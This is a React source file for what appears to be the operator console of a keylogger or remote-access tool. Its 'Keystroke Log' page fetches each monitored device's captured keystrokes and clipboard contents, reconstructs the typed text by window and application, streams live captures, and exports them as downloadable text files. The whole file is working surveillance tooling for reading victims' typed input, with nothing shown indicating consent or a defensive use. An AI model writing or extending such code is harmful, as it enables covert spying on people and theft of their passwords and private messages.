import React, { useEffect, useState, useCallback } from 'react';
import { useParams, useNavigate } from 'react-router-dom';
import { api } from '../store/auth';
import { useLiveEvents } from '../hooks/useLiveEvents';
import BackBtn from '../components/BackBtn';

function computeKeys(raw) {
  let result = '';
  let i = 0;
  while (i < raw.length) {
    if (raw[i] === '[') {
      const end = raw.indexOf(']', i);
      if (end === -1) { result += raw[i++]; continue; }
      const tag = raw.slice(i, end + 1);
      if (tag === '[BS]') result = result.slice(0, -1);
      else if (tag === '[DEL]') result = result.slice(0, -1);
      i = end + 1;
    } else {
      result += raw[i++];
    }
  }
  return result;
}

function computeAll(logs) {
  // Group all loaded log entries by (application, window), concatenate keys in
  // chronological order (oldest first), then resolve backspace/delete sequences.
  // Works correctly with offline-buffered entries that carry original timestamps.
  const groups = new Map();
  [...logs].reverse().forEach(l => {
    const key = `${l.application || '?'}|||${l.window || ''}`;
    if (!groups.has(key)) groups.set(key, { window: l.window || '', application: l.application || '?', raw: '' });
    groups.get(key).raw += l.keys || '';
  });
  return [...groups.values()].map(g => ({
    window: g.window, application: g.application, computed: computeKeys(g.raw),
  })).reverse();
}

function ClipEntry({ entry: c }) {
  const [expanded, setExpanded] = useState(false);
  const [copied, setCopied] = useState(false);
  const isTruncated = (c.text || '').length > 300 || (c.text || '').split('\n').length > 5;

  const copy = useCallback(() => {
    navigator.clipboard.writeText(c.text || '').then(() => {
      setCopied(true);
      setTimeout(() => setCopied(false), 1500);
    });
  }, [c.text]);

  return (
    <div style={{ marginBottom:8, background:'var(--surface)',
      border:'1px solid var(--border)', borderRadius:6, padding:12 }}>
      <div style={{ display:'flex', alignItems:'center', gap:8, marginBottom:4 }}>
        <span style={{ color:'var(--muted)', fontSize:11, flex:1 }}>
          {new Date(c.captured_at + (c.captured_at?.endsWith('Z') ? '' : 'Z')).toLocaleString()}
        </span>
        {isTruncated && (
          <button onClick={() => setExpanded(e => !e)}
            style={{ ...microBtn, color:'var(--accent)' }}>
            {expanded ? 'Collapse' : 'Show all'}
          </button>
        )}
        <button onClick={copy} style={{ ...microBtn, color: copied ? '#22c55e' : 'var(--muted)' }}>
          {copied ? 'Copied!' : 'Copy'}
        </button>
      </div>
      <div style={{ color:'var(--text)', whiteSpace:'pre-wrap', wordBreak:'break-all',
        maxHeight: expanded ? 'none' : 120,
        overflow: expanded ? 'visible' : 'hidden', lineHeight:1.6 }}>{c.text}</div>
      {isTruncated && !expanded && (
        <div style={{ color:'var(--muted)', fontSize:10, marginTop:4, cursor:'pointer' }}
          onClick={() => setExpanded(true)}>▼ click to expand</div>
      )}
    </div>
  );
}

export default function Keylogs() {
  const { deviceId } = useParams();
  const navigate = useNavigate();
  const [logs, setLogs] = useState([]);
  const [filter, setFilter] = useState('');
  const [computed, setComputed] = useState(null);
  const [clipboard, setClipboard] = useState([]);
  const [tab, setTab] = useState('keys');
  const [logOffset, setLogOffset] = useState(0);
  const [clipOffset, setClipOffset] = useState(0);
  const [logHasMore, setLogHasMore] = useState(false);
  const [clipHasMore, setClipHasMore] = useState(false);
  const LOG_PAGE = 500;
  const CLIP_PAGE = 200;

  const load = async () => {
    const { data } = await api.get(`/devices/${deviceId}/keylogs?limit=${LOG_PAGE}&offset=0`);
    setLogs(data);
    setLogOffset(data.length);
    setLogHasMore(data.length === LOG_PAGE);
    setComputed(null);
  };

  const loadMoreLogs = async () => {
    const { data } = await api.get(`/devices/${deviceId}/keylogs?limit=${LOG_PAGE}&offset=${logOffset}`);
    setLogs(prev => [...prev, ...data]);
    setLogOffset(o => o + data.length);
    setLogHasMore(data.length === LOG_PAGE);
    setComputed(null);
  };

  const loadClipboard = async () => {
    const { data } = await api.get(`/devices/${deviceId}/clipboard?limit=${CLIP_PAGE}&offset=0`);
    setClipboard(data);
    setClipOffset(data.length);
    setClipHasMore(data.length === CLIP_PAGE);
  };

  const loadMoreClipboard = async () => {
    const { data } = await api.get(`/devices/${deviceId}/clipboard?limit=${CLIP_PAGE}&offset=${clipOffset}`);
    setClipboard(prev => [...prev, ...data]);
    setClipOffset(o => o + data.length);
    setClipHasMore(data.length === CLIP_PAGE);
  };

  const deleteAllKeylogs = async () => {
    if (!window.confirm('Delete all keylog data for this device?')) return;
    await api.delete(`/devices/${deviceId}/keylogs`);
    setLogs([]); setComputed(null);
  };

  const deleteAllClipboard = async () => {
    if (!window.confirm('Delete all clipboard data for this device?')) return;
    await api.delete(`/devices/${deviceId}/clipboard`);
    setClipboard([]);
  };

  const downloadKeylogs = () => {
    const lines = logs.map(l =>
      `[${l.captured_at}] ${l.application || '?'} — ${l.window || ''}\n${l.keys || ''}`
    ).join('\n\n---\n\n');
    const blob = new Blob([lines], { type: 'text/plain' });
    const url = URL.createObjectURL(blob);
    const a = document.createElement('a');
    a.href = url;
    a.download = `keylogs_${deviceId.slice(0,8)}_${new Date().toISOString().slice(0,10)}.txt`;
    a.click(); URL.revokeObjectURL(url);
  };

  const downloadComputed = (source) => {
    // source = pre-computed array or null (compute all logs on the fly)
    const groups = source || (() => {
      const g = new Map();
      [...logs].reverse().forEach(l => {
        const key = `${l.application || '?'}|||${l.window || ''}`;
        if (!g.has(key)) g.set(key, { window: l.window || '', application: l.application || '?', raw: '' });
        g.get(key).raw += l.keys || '';
      });
      return [...g.values()].map(x => ({
        window: x.window, application: x.application, computed: computeKeys(x.raw),
      })).reverse();
    })();

    const text = groups
      .filter(g => g.computed.trim())
      .map(g => `=== ${g.application} — ${g.window || '(unknown window)'} ===\n${g.computed}`)
      .join('\n\n');
    const blob = new Blob([text || '(no computed output)'], { type: 'text/plain' });
    const url = URL.createObjectURL(blob);
    const a = document.createElement('a');
    a.href = url;
    a.download = `computed_keylogs_${deviceId.slice(0,8)}_${new Date().toISOString().slice(0,10)}.txt`;
    a.click(); URL.revokeObjectURL(url);
  };

  const downloadClipboard = () => {
    const lines = clipboard.map(c => `[${c.captured_at}]\n${c.text || ''}`).join('\n\n---\n\n');
    const blob = new Blob([lines], { type: 'text/plain' });
    const url = URL.createObjectURL(blob);
    const a = document.createElement('a');
    a.href = url;
    a.download = `clipboard_${deviceId.slice(0,8)}_${new Date().toISOString().slice(0,10)}.txt`;
    a.click(); URL.revokeObjectURL(url);
  };

  useEffect(() => { load(); loadClipboard(); }, [deviceId]);

  useLiveEvents((e) => {
    if (e.device_id !== deviceId) return;
    if (e.event === 'keylog') {
      setLogs(prev => [{ id: Date.now(), window: e.window, application: e.application,
        keys: e.keys, captured_at: e.ts }, ...prev]);
      setLogHasMore(false);
    }
    if (e.event === 'clipboard') {
      setClipboard(prev => [{ id: Date.now(), text: e.text, captured_at: e.ts }, ...prev]);
      setClipHasMore(false);
    }
  });

  const filtered = filter
    ? logs.filter(l => l.keys?.toLowerCase().includes(filter.toLowerCase()) ||
                       l.window?.toLowerCase().includes(filter.toLowerCase()))
    : logs;

  return (
    <div>
      <div style={{ display:'flex', alignItems:'center', gap:12, marginBottom:16 }}>
        <BackBtn onClick={() => navigate(`/device/${deviceId}`)} />
        <h2 style={{ fontWeight:700 }}>Keystroke Log</h2>
        <button onClick={() => setTab('keys')}
          style={{ ...btnStyle, ...(tab==='keys' ? { color:'var(--accent)', borderColor:'var(--accent)' } : {}) }}>
          Keystrokes
        </button>
        <button onClick={() => { setTab('clipboard'); loadClipboard(); }}
          style={{ ...btnStyle, ...(tab==='clipboard' ? { color:'var(--accent)', borderColor:'var(--accent)' } : {}) }}>
          Clipboard {clipboard.length > 0 && <span style={{ fontSize:10, marginLeft:4 }}>({clipboard.length})</span>}
        </button>
      </div>

      {tab === 'clipboard' ? (
        <div>
          <div style={{ display:'flex', gap:10, marginBottom:14, flexWrap:'wrap' }}>
            <button onClick={loadClipboard} style={btnStyle}>Refresh</button>
            <button onClick={downloadClipboard} style={btnStyle}>↓ Download</button>
            <button onClick={deleteAllClipboard} style={{ ...btnStyle, color:'#ef4444', borderColor:'#ef444444' }}>Delete All</button>
            <span style={{ color:'var(--muted)', fontSize:12, alignSelf:'center' }}>{clipboard.length} entries</span>
          </div>
          {clipboard.length === 0 ? (
            <p style={{ color:'var(--muted)', textAlign:'center', padding:40 }}>No clipboard data yet.</p>
          ) : (
            <div style={{ fontFamily:'monospace', fontSize:12 }}>
              {clipboard.map((c, i) => (
                <ClipEntry key={i} entry={c} />
              ))}
              {clipHasMore && (
                <button onClick={loadMoreClipboard}
                  style={{ ...btnStyle, width:'100%', marginTop:8, color:'var(--accent)', borderColor:'var(--accent)44' }}>
                  Load more…
                </button>
              )}
            </div>
          )}
        </div>
      ) : (
      <div>
      <div style={{ display:'flex', alignItems:'center', gap:12, marginBottom:20, flexWrap:'wrap' }}>
        <span style={{ color:'var(--muted)', fontSize:12 }}>{filtered.length} entries</span>
        <input value={filter} onChange={e=>setFilter(e.target.value)}
          placeholder="Search…" style={inputStyle} />
        <button onClick={load} style={btnStyle}>Refresh</button>
        <button onClick={() => setComputed(computeAll(logs))}
          style={{ ...btnStyle, color:'var(--accent)', borderColor:'var(--accent)' }}>Compute</button>
        <button onClick={downloadKeylogs} style={btnStyle}>↓ Raw</button>
        <button onClick={() => downloadComputed(null)} style={{ ...btnStyle, color:'var(--accent)', borderColor:'var(--accent)44' }}>↓ Computed</button>
        <button onClick={deleteAllKeylogs} style={{ ...btnStyle, color:'#ef4444', borderColor:'#ef444444' }}>Delete All</button>
        {computed && <button onClick={() => setComputed(null)} style={btnStyle}>✕ Close</button>}
      </div>

      {computed && (
        <div style={{ marginBottom:24, border:'1px solid var(--accent)44',
          borderRadius:8, padding:16, background:'var(--surface)' }}>
          <div style={{ display:'flex', alignItems:'center', gap:10, marginBottom:14 }}>
            <span style={{ fontWeight:600, color:'var(--accent)', fontSize:13 }}>
              Computed input — {logs.length} entries loaded
            </span>
            <span style={{ color:'var(--muted)', fontSize:11 }}>{computed.length} window{computed.length !== 1 ? 's' : ''}</span>
            <button onClick={() => downloadComputed(computed)}
              style={{ marginLeft:'auto', padding:'3px 10px', background:'transparent',
                border:'1px solid var(--accent)44', borderRadius:4,
                color:'var(--accent)', cursor:'pointer', fontSize:11 }}>
              ↓ Download
            </button>
          </div>
          {computed.length === 0 ? (
            <p style={{ color:'var(--muted)', fontSize:12 }}>No keylog entries.</p>
          ) : (
            computed.map((g, i) => (
              <div key={i} style={{ marginBottom:14, fontFamily:'monospace', fontSize:12 }}>
                <div style={{ color:'var(--muted)', marginBottom:4, fontSize:11, textTransform:'uppercase', letterSpacing:.5 }}>
                  {g.application} — {g.window || '(unknown window)'}
                </div>
                <div style={{ background:'var(--bg)', border:'1px solid var(--border)',
                  borderRadius:6, padding:'8px 12px', whiteSpace:'pre-wrap',
                  wordBreak:'break-all', color:'var(--text)', lineHeight:1.7, maxHeight:200, overflowY:'auto' }}>
                  {g.computed || <span style={{ color:'var(--muted)' }}>(empty after resolving special keys)</span>}
                </div>
              </div>
            ))
          )}
        </div>
      )}

      <div style={{ fontFamily:'monospace', fontSize:12 }}>
        {(() => {
          // Group entries by (application, window) preserving insertion order,
          // newest-window-session first. Entries within a group are concatenated.
          const groups = new Map();
          filtered.forEach(l => {
            const key = `${l.application || '?'}|||${l.window || ''}`;
            if (!groups.has(key)) {
              groups.set(key, {
                application: l.application || '?',
                window: l.window || '',
                keys: '',
                latest_at: l.captured_at,
              });
            }
            const g = groups.get(key);
            g.keys += l.keys || '';
            if (l.captured_at > g.latest_at) g.latest_at = l.captured_at;
          });
          const groupList = [...groups.values()];
          if (groupList.length === 0)
            return <p style={{ color:'var(--muted)', textAlign:'center', padding:40 }}>No keylog data yet.</p>;
          return <>
            {groupList.map((g, i) => (
              <div key={i} style={{ marginBottom:8, background:'var(--surface)',
                border:'1px solid var(--border)', borderRadius:6, padding:12 }}>
                <div style={{ display:'flex', gap:16, marginBottom:4 }}>
                  <span style={{ color:'var(--accent)' }}>{g.application}</span>
                  <span style={{ color:'var(--muted)' }}>{g.window}</span>
                  <span style={{ color:'var(--muted)', marginLeft:'auto' }}>
                    {new Date(g.latest_at + (g.latest_at?.endsWith('Z') ? '' : 'Z')).toLocaleString()}
                  </span>
                </div>
                <div style={{ color:'var(--text)', whiteSpace:'pre-wrap', wordBreak:'break-all',
                  maxHeight:200, overflowY:'auto', lineHeight:1.6 }}>{g.keys}</div>
              </div>
            ))}
            {logHasMore && (
              <button onClick={loadMoreLogs}
                style={{ ...btnStyle, width:'100%', marginTop:8, color:'var(--accent)', borderColor:'var(--accent)44' }}>
                Load more…
              </button>
            )}
          </>;
        })()}
      </div>
      </div>
      )}
    </div>
  );
}

const inputStyle = {
  padding:'6px 10px', background:'var(--surface)', border:'1px solid var(--border)',
  borderRadius:6, color:'var(--text)', fontSize:13, width:220,
};
const btnStyle = {
  padding:'6px 14px', background:'transparent', border:'1px solid var(--border)',
  borderRadius:6, color:'var(--muted)', cursor:'pointer',
};
const microBtn = {
  padding:'2px 8px', background:'transparent', border:'1px solid var(--border)',
  borderRadius:4, fontSize:10, cursor:'pointer',
};
